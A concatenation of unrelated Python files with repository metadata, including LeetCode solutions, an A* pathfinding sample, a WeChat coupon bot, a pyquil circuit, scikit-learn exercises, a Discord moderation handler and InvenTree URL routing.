'{}%'.format(int(100.0*emu.epoch/TOTAL_EPOCHS)), print log_file_name time.sleep(1) sys.stdout = log_file sys.stdout = sys_stdout log_file.close() print print log_file_name, print '{:.3f} sec,'.format(time.time()-t), print '{:.3f} min'.format((time.time()-t)/60)
6fdc3db5b428914f4813bf4199befece5ed7563e
df4a7c46c46d1eca6570493b9707bdf64e54f8d3
/py/209.minimum-size-subarray-sum.py
adaf3f0e6093c8efaad3d2fbdcb5fae7fb66b2a1
[]
no_license
CharmSun/my-leetcode
52a39bf719c507fb7032ed424fe857ba7340aea3
5325a56ba8c40d74d9fef2b19bac63a4e2c44a38
refs/heads/master
2023-03-29T06:39:49.614264
2021-03-28T16:33:52
2021-03-28T16:33:52
261,364,001
0
0
null
null
null
null
UTF-8
Python
false
false
790
py
# # @lc app=leetcode id=209 lang=python3 # # [209] Minimum Size Subarray Sum # # @lc code=start from typing import List class Solution: # 双指针移动 def minSubArrayLen(self, target: int, nums: List[int]) -> int: if not nums: return 0 left = 0 right = -1 sum = 0 length = len(nums) + 1 while left < len(nums) and right < len(nums): if right < len(nums) - 1 and sum < target: right += 1 sum += nums[right] else: sum -= nums[left] left += 1 if sum >= target: length = min(length, right - left + 1) if length == len(nums) + 1: return 0 return length # @lc code=end
e80ac8c78a628d36e3b4d0788d9adfb5968ae19d
e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f
/indices/flicker.py
c9770573731f1ec62ddbbc5ee7fd117eb6088ec5
[]
no_license
psdh/WhatsintheVector
e8aabacc054a88b4cb25303548980af9a10c12a8
a24168d068d9c69dc7a0fd13f606c080ae82e2a6
refs/heads/master
2021-01-25T10:34:22.651619
2015-09-23T11:54:06
2015-09-23T11:54:06
42,749,205
2
3
null
2015-09-23T11:54:07
2015-09-18T22:06:38
Python
UTF-8
Python
false
false
546
py
ii = [('CookGHP3.py', 1), ('KembFJ1.py', 1), ('TennAP.py', 1), ('CarlTFR.py', 5), ('LyttELD.py', 1), ('TalfTAC.py', 1), ('AinsWRR3.py', 1), ('BailJD1.py', 1), ('RoscTTI2.py', 1), ('GilmCRS.py', 1), ('DibdTRL2.py', 1), ('AinsWRR.py', 1), ('MedwTAI.py', 1), ('FerrSDO2.py', 1), ('TalfTIT.py', 3), ('MedwTAI2.py', 1), ('HowiWRL2.py', 1), ('MartHRW.py', 2), ('LyttELD3.py', 4), ('KembFJ2.py', 1), ('AinsWRR2.py', 1), ('BrewDTO.py', 1), ('ClarGE3.py', 1), ('RogeSIP.py', 1), ('MartHRW2.py', 1), ('MartHSI.py', 2), ('NortSTC.py', 1), ('BeckWRE.py', 1)]
09228ae64537dd9fb78fcabb808a96dacec36126
2ab391bfaadf0743da8ffee084896b999e88482d
/wx.py
a2bd1358136ac0530889f2fe820be14236fd42ec
[]
no_license
wean/coupon-windows
552a59637ea45539bdfa70c6d1bd04626f0fdbd0
9565b23c7f44594f182d7a268d4ed45bdeaf8dd3
refs/heads/master
2020-04-05T07:11:43.024665
2017-11-24T08:23:50
2017-11-24T08:23:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,676
py
# -*- coding:utf-8 -*- import random import itchat import time from schedule import Schedule from search import SearchingKeyRegex from special import Searcher from utils import getProperty, randomSleep, reprDict class WX(Schedule): def __init__(self, configFile): Schedule.__init__(self, configFile) self.searcher = Searcher(configFile) self.configFile = configFile def login(self, exitCallback, uuid=None): def isLoginned(uuid): for count in range(10): status = int(itchat.check_login(uuid)) if status is 200: return True if status is 201: print 'Wait for confirm in mobile #', count randomSleep(1, 2) continue print 'Error status:', status return False return False if uuid is None: statusFile = getProperty(self.configFile, 'wechat-status-file') itchat.auto_login(hotReload=True, statusStorageDir=statusFile) else: if not isLoginned(uuid): raise Exception('Failed to login with {}'.format(uuid)) userInfo = itchat.web_init() itchat.show_mobile_login() itchat.get_friends(True) itchat.start_receiving(exitCallback) self.me = itchat.search_friends() print self.me['NickName'], 'is working' self.watchFriends = list() names = getProperty(self.configFile, 'wechat-watch-friends').split(';') for name in names: friends = itchat.search_friends(name=name) self.watchFriends.extend(friends) self.watchGroups = list() names = getProperty(self.configFile, 'wechat-watch-groups').split(';') for name in names: groups = itchat.search_chatrooms(name=name) self.watchGroups.extend(groups) self.searchReplyPlate = getProperty(self.configFile, 'search-reply-plate') itchat.run(blockThread=False) # Run in a new thread self.run() @staticmethod def sendTo(obj, plate=None, image=None): print '================================================================' print 'Send a message to', obj['NickName'] if plate is not None: interval = random.random() * 10 time.sleep(interval) ret = obj.send(plate) print 'Result of text message:', ret['BaseResponse']['ErrMsg'] print '----------------------------------------------------------------' print plate print '----------------------------------------------------------------' if image is not None: interval = random.random() * 10 time.sleep(interval) ret = obj.send_image(image) print 'Result of', image, ':', ret['BaseResponse']['ErrMsg'] print '================================================================' def text(self, msg): for friend in self.watchFriends: if msg['FromUserName'] == friend['UserName']: break else: return print '================================================================' print msg['User']['NickName'], 'sends a message:' print '----------------------------------------------------------------' print msg['Content'] print '================================================================' self.search(friend, msg['Content']) def textGroup(self, msg): for friend in self.watchGroups: if msg['FromUserName'] == friend['UserName']: break else: return print '================================================================' print msg['User']['NickName'], 'sends a message:' print '----------------------------------------------------------------' print msg['Content'] print '================================================================' self.search(friend, msg['Content']) def send(self, plate, image): for friend in self.watchFriends: WX.sendTo(friend, plate, image) def search(self, friend, content): content = SearchingKeyRegex.parse(content) if content is None: return print 'Searching', content WX.sendTo(friend, self.searchReplyPlate.format(content.replace('#', ' '))) if not self.searcher.search(content): return WX.sendTo(friend, self.searcher.plate, self.searcher.image)
cb97bf7ae5fc7b209d27f00b58948f0f6626da16
8d38f23ec63e75f433d5de33c5d9bc51c9d7ac90
/choco_py/03/__init__.py
f9160e38a2c85aee2b289c5caaf6fd40b73d3da4
[]
no_license
aliwo/ChocoPy
4a957468ef38a3bfcd99f112541e6e5b0e2adbdc
eb339c4103e5400c2cf8435b1d6af5f7b3b60548
refs/heads/master
2023-05-27T09:38:28.609554
2019-10-19T12:09:03
2019-10-19T12:09:03
211,509,685
5
1
null
2023-05-01T21:15:21
2019-09-28T14:06:06
Python
UTF-8
Python
false
false
100
py
# 이제 초코 변수들이 현재 갖고 있는 초코의 양을 나타내게 되었습니다.
10bd16b2629d3c226a90fa9ed757fd210049d940
2e1c1558f6fcb12a57449f9f6f0db6f1cbf38dd6
/tests/integrations/test_package/config/test.py
1523cb68f132b4ed41f31b404461758a9e2d19e6
[ "MIT" ]
permissive
MasoniteFramework/masonite
ca51bf3d0e4777e624b3a9e94d1360936fb8006d
e8e55e5fdced9f28cc8acb1577457a490e5b4b74
refs/heads/4.0
2023-09-01T18:59:01.331411
2022-11-05T01:29:29
2022-11-05T01:29:29
113,248,605
2,173
185
MIT
2023-04-02T02:29:18
2017-12-06T00:30:22
Python
UTF-8
Python
false
false
29
py
PARAM_1 = "test" PARAM_2 = 1
beead89528382b978348836d26fab1b78be43800
26e4bea46942b9afa5a00b9cde9a84f2cc58e3c9
/pygame/Astar/implementation.py
4965fc01f99a6ab2206ed2468d00869b3bb21107
[]
no_license
MeetLuck/works
46da692138cb9741a913d84eff6822f107510dc7
ab61175bb7e2ed5c5113bf150e0541ae18eb04c4
refs/heads/master
2020-04-12T05:40:25.143075
2017-08-21T17:01:06
2017-08-21T17:01:06
62,373,576
2
1
null
null
null
null
UTF-8
Python
false
false
5,781
py
# Sample code from http://www.redblobgames.com/pathfinding/ # Copyright 2014 Red Blob Games <[email protected]> # # Feel free to use this code in your own projects, including commercial projects # License: Apache v2.0 <http://www.apache.org/licenses/LICENSE-2.0.html> from __future__ import print_function class SimpleGraph: def __init__(self): self.edges = {} def neighbors(self, id): return self.edges[id] example_graph = SimpleGraph() example_graph.edges = { 'A': ['B'], 'B': ['A', 'C', 'D'], 'C': ['A'], 'D': ['E', 'A'], 'E': ['B'] } import collections class Queue: def __init__(self): self.elements = collections.deque() def empty(self): return len(self.elements) == 0 def put(self, x): self.elements.append(x) def get(self): return self.elements.popleft() # utility functions for dealing with square grids def from_id_width(id, width): return (id % width, id // width) def draw_tile(graph, id, style, width): r = "." if 'number' in style and id in style['number']: r = "%d" % style['number'][id] if 'point_to' in style and style['point_to'].get(id, None) is not None: (x1, y1) = id (x2, y2) = style['point_to'][id] if x2 == x1 + 1: r = "\u2192" if x2 == x1 - 1: r = "\u2190" if y2 == y1 + 1: r = "\u2193" if y2 == y1 - 1: r = "\u2191" if 'start' in style and id == style['start']: r = "A" if 'goal' in style and id == style['goal']: r = "Z" if 'path' in style and id in style['path']: r = "@" if id in graph.walls: r = "#" * width return r def draw_grid(graph, width=2, **style): for y in range(graph.height): for x in range(graph.width): print("%%-%ds" % width % draw_tile(graph, (x, y), style, width), end="") print() # data from main article DIAGRAM1_WALLS = [from_id_width(id, width=30) for id in [21,22,51,52,81,82,93,94,111,112,123,124,133,134,141,142,153,154,163,164,171,172,173,174,175,183,184,193,194,201,202,203,204,205,213,214,223,224,243,244,253,254,273,274,283,284,303,304,313,314,333,334,343,344,373,374,403,404,433,434]] class SquareGrid: def __init__(self, width, height): self.width = width self.height = height self.walls = [] def in_bounds(self, id): (x, y) = id return 0 <= x < self.width and 0 <= y < self.height def passable(self, id): return id not in self.walls def neighbors(self, id): (x, y) = id results = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)] if (x + y) % 2 == 0: results.reverse() # aesthetics results = filter(self.in_bounds, results) results = filter(self.passable, results) return results class GridWithWeights(SquareGrid): def __init__(self, width, height): SquareGrid.__init__(self,width, height) self.weights = {} def cost(self, from_node, to_node): return self.weights.get(to_node, 1) diagram4 = GridWithWeights(10, 10) diagram4.walls = [(1, 7), (1, 8), (2, 7), (2, 8), (3, 7), (3, 8)] diagram4.weights = {loc: 5 for loc in [(3, 4), (3, 5), (4, 1), (4, 2), (4, 3), (4, 4), (4, 5), (4, 6), (4, 7), (4, 8), (5, 1), (5, 2), (5, 3), (5, 4), (5, 5), (5, 6), (5, 7), (5, 8), (6, 2), (6, 3), (6, 4), (6, 5), (6, 6), (6, 7), (7, 3), (7, 4), (7, 5)]} import heapq class PriorityQueue: def __init__(self): self.elements = [] def empty(self): return len(self.elements) == 0 def put(self, item, priority): heapq.heappush(self.elements, (priority, item)) def get(self): return heapq.heappop(self.elements)[1] def dijkstra_search(graph, start, goal): frontier = PriorityQueue() frontier.put(start, 0) came_from = {} cost_so_far = {} came_from[start] = None cost_so_far[start] = 0 while not frontier.empty(): current = frontier.get() if current == goal: break for next in graph.neighbors(current): new_cost = cost_so_far[current] + graph.cost(current, next) if next not in cost_so_far or new_cost < cost_so_far[next]: cost_so_far[next] = new_cost priority = new_cost frontier.put(next, priority) came_from[next] = current return came_from, cost_so_far def reconstruct_path(came_from, start, goal): current = goal path = [current] while current != start: current = came_from[current] path.append(current) path.append(start) # optional path.reverse() # optional return path def heuristic(a, b): (x1, y1) = a (x2, y2) = b return abs(x1 - x2) + abs(y1 - y2) def a_star_search(graph, start, goal): frontier = PriorityQueue() frontier.put(start, 0) came_from = {} cost_so_far = {} came_from[start] = None cost_so_far[start] = 0 while not frontier.empty(): current = frontier.get() if current == goal: break for next in graph.neighbors(current): new_cost = cost_so_far[current] + graph.cost(current, next) if next not in cost_so_far or new_cost < cost_so_far[next]: cost_so_far[next] = new_cost priority = new_cost + heuristic(goal, next) frontier.put(next, priority) came_from[next] = current return came_from, cost_so_far
bbbb9c609651e91e3a3c15c139ff1b5813c22879
09e57dd1374713f06b70d7b37a580130d9bbab0d
/benchmark/startPyquil2333.py
c971dffe1465e621fa1a309de3e74ac9949af7f2
[ "BSD-3-Clause" ]
permissive
UCLA-SEAL/QDiff
ad53650034897abb5941e74539e3aee8edb600ab
d968cbc47fe926b7f88b4adf10490f1edd6f8819
refs/heads/main
2023-08-05T04:52:24.961998
2021-09-19T02:56:16
2021-09-19T02:56:16
405,159,939
2
0
null
null
null
null
UTF-8
Python
false
false
1,698
py
# qubit number=4 # total number=29 import pyquil from pyquil.api import local_forest_runtime, QVMConnection from pyquil import Program, get_qc from pyquil.gates import * import numpy as np conn = QVMConnection() def make_circuit()-> Program: prog = Program() # circuit begin prog += CNOT(0,3) # number=14 prog += X(3) # number=15 prog += RX(1.8001325905069514,3) # number=18 prog += CNOT(0,3) # number=16 prog += H(1) # number=22 prog += H(1) # number=2 prog += H(2) # number=3 prog += H(3) # number=4 prog += H(0) # number=5 prog += X(3) # number=24 prog += H(1) # number=6 prog += X(1) # number=25 prog += H(2) # number=7 prog += H(3) # number=8 prog += CNOT(1,0) # number=26 prog += Z(1) # number=27 prog += CNOT(1,0) # number=28 prog += H(0) # number=9 prog += CNOT(2,0) # number=10 prog += X(1) # number=17 prog += CNOT(2,0) # number=11 prog += Y(0) # number=12 prog += Y(0) # number=13 prog += CNOT(2,1) # number=23 prog += X(0) # number=19 prog += X(0) # number=20 # circuit end return prog def summrise_results(bitstrings) -> dict: d = {} for l in bitstrings: if d.get(l) is None: d[l] = 1 else: d[l] = d[l] + 1 return d if __name__ == '__main__': prog = make_circuit() qvm = get_qc('4q-qvm') results = qvm.run_and_measure(prog,1024) bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T bitstrings = [''.join(map(str, l)) for l in bitstrings] writefile = open("../data/startPyquil2333.csv","w") print(summrise_results(bitstrings),file=writefile) writefile.close()
fbddef4b9d48e173fddbe92424567a8926db63a3
94c7440e7f1d2fdbe4a1e26b9c75a94e49c14eb4
/leetcode/303.py
3e11c0d02ea85837838c1abfd9fcbb8f9d209292
[ "Apache-2.0" ]
permissive
windniw/just-for-fun
7ddea4f75cf3466a400b46efe36e57f6f7847c48
44e1ff60f8cfaf47e4d88988ee67808f0ecfe828
refs/heads/master
2022-08-18T09:29:57.944846
2022-07-25T16:04:47
2022-07-25T16:04:47
204,949,602
1
0
null
null
null
null
UTF-8
Python
false
false
432
py
""" link: https://leetcode.com/problems/range-sum-query-immutable problem: 离线计算数组区间和 solution: 转存 sum[:i] """ class NumArray: def __init__(self, nums: List[int]): self.s = [0 for _ in range(len(nums) + 1)] for i in range(1, len(nums) + 1): self.s[i] = self.s[i - 1] + nums[i - 1] def sumRange(self, i: int, j: int) -> int: return self.s[j + 1] - self.s[i]
150ada0104f487967baa8037bdf9800d1d660c71
d10c5d3603e027a8fd37115be05e62634ec0f0a5
/13_Machine-Learning-with-Tree-Based-Models-in-Python/13_ex_1-12.py
8bc8ee02a70ea444f217bbab5bc0d3c2c3a249c6
[]
no_license
stacygo/2021-01_UCD-SCinDAE-EXS
820049125b18b38ada49ffc2036eab33431d5740
027dc2d2878314fc8c9b2796f0c2e4c781c6668d
refs/heads/master
2023-04-29T01:44:36.942448
2021-05-23T15:29:28
2021-05-23T15:29:28
335,356,448
2
0
null
null
null
null
UTF-8
Python
false
false
1,032
py
# Exercise 1-12: Linear regression vs regression tree import pandas as pd from sklearn.model_selection import train_test_split from sklearn.linear_model import LinearRegression from sklearn.tree import DecisionTreeRegressor from sklearn.metrics import mean_squared_error as MSE SEED = 3 df = pd.read_csv('input/auto.csv') y = df['mpg'] X = pd.get_dummies(df.drop(['mpg'], axis=1)) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=SEED) dt = DecisionTreeRegressor(max_depth=8, min_samples_leaf=0.13, random_state=SEED) dt.fit(X_train, y_train) y_pred = dt.predict(X_test) mse_dt = MSE(y_test, y_pred) rmse_dt = mse_dt**(1/2) lr = LinearRegression() lr.fit(X_train, y_train) # Predict test set labels y_pred_lr = lr.predict(X_test) # Compute mse_lr mse_lr = MSE(y_test, y_pred_lr) # Compute rmse_lr rmse_lr = mse_lr**(1/2) # Print rmse_lr print('Linear Regression test set RMSE: {:.2f}'.format(rmse_lr)) # Print rmse_dt print('Regression Tree test set RMSE: {:.2f}'.format(rmse_dt))
f13dd503a9b25ec0cf197860872374891737e452
24c84c5b93cd816976d370a99982f45e0d18a184
/ArraysProblem/Python/FindAllNumbersDisappearedinAnArray.py
25420fb3ce55ce8bdb7c4beb3f9a49d0977405c8
[]
no_license
purushottamkaushik/DataStructuresUsingPython
4ef1cf33f1af3fd25105a45be4f179069e327628
e016fe052c5600dcfbfcede986d173b401ed23fc
refs/heads/master
2023-03-12T13:25:18.186446
2021-02-28T18:21:37
2021-02-28T18:21:37
343,180,450
0
0
null
null
null
null
UTF-8
Python
false
false
719
py
class Solution: def findDisappearedNumbers(self, nums): lst = [] if not nums: return lst m = max(nums) for i in range(len(nums)): print(i) if i+1 in nums: continue else: lst.append(i+1) return lst def findDisappearedNumbers2(self, nums): s = set(nums) n = len(nums) + 1 lst = [] for i in range(1,n): if i not in s: lst.append(i) return lst s = Solution().findDisappearedNumbers([1,1]) print(s)
ce59e45ee8cddd99cedd8e16aefcff92641a326a
8214e7369f2b86f19602eaffe9e8072f336391bb
/tasks.py
e4ab65a9167e0813e7287c98ba19959386973525
[ "BSD-3-Clause" ]
permissive
pydev-git/cookiecutter_flask_docker
27dc47e69a957bd89aeb76db13cc0a08897cd467
0bbe0f366d0d8d914b02518c94f5ff75d03386b5
refs/heads/master
2021-06-01T11:30:30.912658
2016-07-27T08:05:18
2016-07-27T08:05:18
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,184
py
#!/usr/bin/env python # -*- coding: utf-8 -*- """Invoke tasks.""" import os import json import shutil from invoke import task, run HERE = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(HERE, 'cookiecutter.json'), 'r') as fp: COOKIECUTTER_SETTINGS = json.load(fp) # Match default value of app_name from cookiecutter.json COOKIE = os.path.join(HERE, COOKIECUTTER_SETTINGS['app_name']) REQUIREMENTS = os.path.join(COOKIE, 'requirements', 'dev.txt') @task def build(): """Build the cookiecutter.""" run('cookiecutter {0} --no-input'.format(HERE)) @task def clean(): """Clean out generated cookiecutter.""" if os.path.exists(COOKIE): shutil.rmtree(COOKIE) print('Removed {0}'.format(COOKIE)) else: print('App directory does not exist. Skipping.') def _run_manage_command(command): run('python {0} {1}'.format(os.path.join(COOKIE, 'manage.py'), command), echo=True) @task(pre=[clean, build]) def test(): """Run lint commands and tests.""" run('pip install -r {0} --ignore-installed'.format(REQUIREMENTS), echo=True) os.chdir(COOKIE) _run_manage_command('lint') _run_manage_command('test')
e06215fdfb4e2456cf5f6f26ef24b108051d7371
cd9eb87e3e1b04e6f421377eff02514de05c98e2
/learn_SciPy/scikit-learn/User Guide/1. Supervised learning/1.10. Decision Trees.py
2e0907d0cc61331fa0146ca0c4f1677688f35028
[]
no_license
zhaojinxi/learn_python
45f116f9729bbf19d9bb4a574b06e0ec41f754dc
07b4a5a231e39b6d2c28f98e99a3a8fe3cb534c4
refs/heads/master
2021-06-05T22:00:02.528023
2020-03-22T04:19:22
2020-03-22T04:19:22
129,857,802
4
3
null
null
null
null
UTF-8
Python
false
false
1,079
py
import sklearn.tree import sklearn.datasets import graphviz #1.10.1. Classification X = [[0, 0], [1, 1]] Y = [0, 1] clf = sklearn.tree.DecisionTreeClassifier() clf = clf.fit(X, Y) clf.predict([[2., 2.]]) clf.predict_proba([[2., 2.]]) iris = sklearn.datasets.load_iris() clf = sklearn.tree.DecisionTreeClassifier() clf = clf.fit(iris.data, iris.target) dot_data = sklearn.tree.export_graphviz(clf, out_file=None) graph = graphviz.Source(dot_data) graph.render("iris") dot_data = sklearn.tree.export_graphviz(clf, out_file=None, feature_names=iris.feature_names, class_names=iris.target_names, filled=True, rounded=True, special_characters=True) graph = graphviz.Source(dot_data) graph clf.predict(iris.data[:1, :]) clf.predict_proba(iris.data[:1, :]) #1.10.2. Regression X = [[0, 0], [2, 2]] y = [0.5, 2.5] clf = sklearn.tree.DecisionTreeRegressor() clf = clf.fit(X, y) clf.predict([[1, 1]]) #1.10.3. Multi-output problems #1.10.4. Complexity #1.10.5. Tips on practical use #1.10.6. Tree algorithms: ID3, C4.5, C5.0 and CART #1.10.7. Mathematical formulation
ab37819178678efc8832a481c7d0f60c89cf7dfe
c27e78d35cdc802e4790280c384a0f97acf636ef
/src/rulesTest.py
c7cda2cbd1a74e52e447aefbc5576b0f6f3b5dc3
[]
no_license
undersea/Special_Topic
99e424d9e443523a4d880ef478455bb75d7c82cd
7bf7ed2c92b864d99790b927965bad819bfb7cfb
refs/heads/master
2020-03-25T04:01:26.909441
2011-05-30T03:26:53
2011-05-30T03:26:53
3,587,506
1
0
null
null
null
null
UTF-8
Python
false
false
766
py
from unittest import TestCase, main from rules import Degree class TestRules(TestCase): def setUp(self): print "setUp" self.rules = Degree() pass def tearDown(self): print "tearDown" del self.rules pass def testAdd(self): count = len(self.rules.rules) rule = ("one of","one") self.rules.add(rule) self.assertEqual(count, 0) self.assertEqual(len(self.rules.rules), 1) def testDelete(self): rule = ("one of","one") self.rules.rules.append(rule) count = len(self.rules.rules) self.assertEqual(count, 1) self.rules.delete(rule) self.assertEqual(len(self.rules.rules), 0) if __name__ == "__main__": main()
4698bbd10d6f9865b9e14c4ccd5f0c59b5bd7996
8f506513cb73d9bdb5dbdd9084aaba020b1efbea
/Course_1-Algorithmic_Toolbox/Week-1/Excercise_Challenges/2_maximum_pairwise_product/max_pairwise_product.py
16ef706e59671dba4d782c766223be8cf322274f
[]
no_license
KhanAjmal007/Data-Structures-and-Algorithms-Specialization-Coursera
1255ecf877ecd4a91bda8b85e9c96566fe6d5e4d
ab6e618c5d8077febb072091e80c16f5f1a15465
refs/heads/master
2023-03-21T04:18:04.580423
2020-07-11T07:18:06
2020-07-11T07:18:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
401
py
def max_pairwise_product(numbers): max1 = -999 max2 = -9999 for value in numbers: if value > max1: max2 = max1 max1 = value elif value > max2: max2 = value return max1 * max2 if __name__ == '__main__': input_n = int(input()) input_numbers = [int(x) for x in input().split()] print(max_pairwise_product(input_numbers))
f2f4d6b715cc9b11ba5174b51906804ad1a1ca7e
544cfadc742536618168fc80a5bd81a35a5f2c99
/tools/external_updater/base_updater.py
18d4435858c7a22b295ca26455f4abbaf44d16d4
[]
no_license
ZYHGOD-1/Aosp11
0400619993b559bf4380db2da0addfa9cccd698d
78a61ca023cbf1a0cecfef8b97df2b274ac3a988
refs/heads/main
2023-04-21T20:13:54.629813
2021-05-22T05:28:21
2021-05-22T05:28:21
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,590
py
# Copyright (C) 2018 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Base class for all updaters.""" from pathlib import Path import fileutils # pylint: disable=import-error import metadata_pb2 # type: ignore class Updater: """Base Updater that defines methods common for all updaters.""" def __init__(self, proj_path: Path, old_url: metadata_pb2.URL, old_ver: str) -> None: self._proj_path = fileutils.get_absolute_project_path(proj_path) self._old_url = old_url self._old_ver = old_ver self._new_url = metadata_pb2.URL() self._new_url.CopyFrom(old_url) self._new_ver = old_ver self._has_errors = False def is_supported_url(self) -> bool: """Returns whether the url is supported.""" raise NotImplementedError() def check(self) -> None: """Checks whether a new version is available.""" raise NotImplementedError() def update(self) -> None: """Updates the package. Has to call check() before this function. """ raise NotImplementedError() @property def project_path(self) -> Path: """Gets absolute path to the project.""" return self._proj_path @property def current_version(self) -> str: """Gets the current version.""" return self._old_ver @property def current_url(self) -> metadata_pb2.URL: """Gets the current url.""" return self._old_url @property def latest_version(self) -> str: """Gets latest version.""" return self._new_ver @property def latest_url(self) -> metadata_pb2.URL: """Gets URL for latest version.""" return self._new_url @property def has_errors(self) -> bool: """Gets whether this update had an error.""" return self._has_errors def use_current_as_latest(self): """Uses current version/url as the latest to refresh project.""" self._new_ver = self._old_ver self._new_url = self._old_url
a85110d0091d407c2364cee12549f5de1adf8a07
6b2a8dd202fdce77c971c412717e305e1caaac51
/solutions_5744014401732608_0/Python/ArbokEkans/C.py
413f74cc89b84cfd4dc8d0ba77d001600a4d53ea
[]
no_license
alexandraback/datacollection
0bc67a9ace00abbc843f4912562f3a064992e0e9
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
refs/heads/master
2021-01-24T18:27:24.417992
2017-05-23T09:23:38
2017-05-23T09:23:38
84,313,442
2
4
null
null
null
null
UTF-8
Python
false
false
979
py
def solve(): b, m = [int(i) for i in input().split()] if m > 2**(b-2): return "IMPOSSIBLE" else: graph = construct(b) rep = bin(m)[2:][::-1] if m == 2**(b-2): for key in graph: if key != b-1: graph[key].append(b-1) else: for i, digit in enumerate(rep): if digit == "1": graph[i+1].append(b-1) res = ["POSSIBLE"] for i in range(b): row = [] for j in range(b): if j in graph[i]: row.append(1) else: row.append(0) res.append(''.join(str(x) for x in row)) return '\n'.join(res) def construct(b): d = {i:list(range(i+1,b-1)) for i in range(b) } return d n_cases = int(input()) for n_case in range(n_cases): print("Case #{}: {}".format(n_case+1, solve()))
36b479f0a4a7e4c24279afbf988d9396960305bd
81a9840c702927b4ca9ef17b766064f1d3c9139d
/mantabot/apps/moderation/handlers/readonly.py
212eafdce5f9d13f3499cb72f207fa73becc05d9
[ "MIT" ]
permissive
spectras/mantabot
58b2d996ccd359c7720006b87ab94db1ac07956f
9b2de297d46224d66a84b8925e09cc209d8b37d4
refs/heads/master
2020-03-19T12:42:20.893443
2018-06-07T23:25:09
2018-06-07T23:25:09
136,534,522
2
0
null
null
null
null
UTF-8
Python
false
false
1,065
py
import discord from mantabot.apps.moderation import service class ReadOnly(object): """ Simple plugin that deletes messages sent to some channels """ name = 'moderation.readonly' def __init__(self, client): self.client = client async def on_message(self, message): channel = message.channel if not isinstance(channel, discord.abc.GuildChannel): return if message.author.bot: return # Handle readonly if await service.get_readonly(channel): try: await message.delete() except discord.NotFound: pass # this is okay, message is already deleted except discord.Forbidden: await service.set_readonly(channel, False, user=channel.guild.me, reason='forbidden') # Handle mutes if await service.get_channel_member_muted(channel, message.author): try: await message.delete() except (discord.NotFound, discord.Forbidden): pass
18426ac763d7a141d3556b448fb271532e0d54af
3c3095585c075002b707475b49bdd8d8c7d4b71d
/InvenTree/InvenTree/urls.py
d9600333f4698fcd539486876a45dfd4ae42af04
[ "MIT" ]
permissive
andyseracuse/InvenTree
ffa7c0a2d131b363c0b93c2d888a9a89c0048bf7
c5166ec845ffe9477ab488931775dcdfd1dce7e7
refs/heads/master
2022-06-08T12:54:11.522718
2020-04-20T09:30:58
2020-04-20T09:30:58
258,296,796
0
0
MIT
2020-04-23T18:33:12
2020-04-23T18:33:11
null
UTF-8
Python
false
false
4,211
py
""" Top-level URL lookup for InvenTree application. Passes URL lookup downstream to each app as required. """ from django.conf.urls import url, include from django.contrib import admin from django.contrib.auth import views as auth_views from qr_code import urls as qr_code_urls from company.urls import company_urls from company.urls import supplier_part_urls from company.urls import price_break_urls from common.urls import common_urls from part.urls import part_urls from stock.urls import stock_urls from build.urls import build_urls from order.urls import order_urls from common.api import common_api_urls from part.api import part_api_urls, bom_api_urls from company.api import company_api_urls from stock.api import stock_api_urls from build.api import build_api_urls from order.api import po_api_urls from django.conf import settings from django.conf.urls.static import static from django.views.generic.base import RedirectView from rest_framework.documentation import include_docs_urls from .views import IndexView, SearchView, DatabaseStatsView from .views import SettingsView, EditUserView, SetPasswordView from .api import InfoView, BarcodePluginView, ActionPluginView from users.urls import user_urls admin.site.site_header = "InvenTree Admin" apipatterns = [ url(r'^common/', include(common_api_urls)), url(r'^part/', include(part_api_urls)), url(r'^bom/', include(bom_api_urls)), url(r'^company/', include(company_api_urls)), url(r'^stock/', include(stock_api_urls)), url(r'^build/', include(build_api_urls)), url(r'^po/', include(po_api_urls)), # User URLs url(r'^user/', include(user_urls)), # Plugin endpoints url(r'^barcode/', BarcodePluginView.as_view(), name='api-barcode-plugin'), url(r'^action/', ActionPluginView.as_view(), name='api-action-plugin'), # InvenTree information endpoint url(r'^$', InfoView.as_view(), name='api-inventree-info'), ] settings_urls = [ url(r'^user/?', SettingsView.as_view(template_name='InvenTree/settings/user.html'), name='settings-user'), url(r'^currency/?', SettingsView.as_view(template_name='InvenTree/settings/currency.html'), name='settings-currency'), url(r'^part/?', SettingsView.as_view(template_name='InvenTree/settings/part.html'), name='settings-part'), url(r'^other/?', SettingsView.as_view(template_name='InvenTree/settings/other.html'), name='settings-other'), # Catch any other urls url(r'^.*$', SettingsView.as_view(template_name='InvenTree/settings/user.html'), name='settings'), ] urlpatterns = [ url(r'^part/', include(part_urls)), url(r'^supplier-part/', include(supplier_part_urls)), url(r'^price-break/', include(price_break_urls)), url(r'^common/', include(common_urls)), url(r'^stock/', include(stock_urls)), url(r'^company/', include(company_urls)), url(r'^order/', include(order_urls)), url(r'^build/', include(build_urls)), url(r'^auth/', include('rest_framework.urls', namespace='rest_framework')), url(r'^login/', auth_views.LoginView.as_view(), name='login'), url(r'^logout/', auth_views.LogoutView.as_view(template_name='registration/logout.html'), name='logout'), url(r'^settings/', include(settings_urls)), url(r'^edit-user/', EditUserView.as_view(), name='edit-user'), url(r'^set-password/', SetPasswordView.as_view(), name='set-password'), url(r'^admin/', admin.site.urls, name='inventree-admin'), url(r'^qr_code/', include(qr_code_urls, namespace='qr_code')), url(r'^index/', IndexView.as_view(), name='index'), url(r'^search/', SearchView.as_view(), name='search'), url(r'^stats/', DatabaseStatsView.as_view(), name='stats'), url(r'^api/', include(apipatterns)), url(r'^api-doc/', include_docs_urls(title='InvenTree API')), url(r'^markdownx/', include('markdownx.urls')), ] # Static file access urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) # Media file access urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) # Send any unknown URLs to the parts page 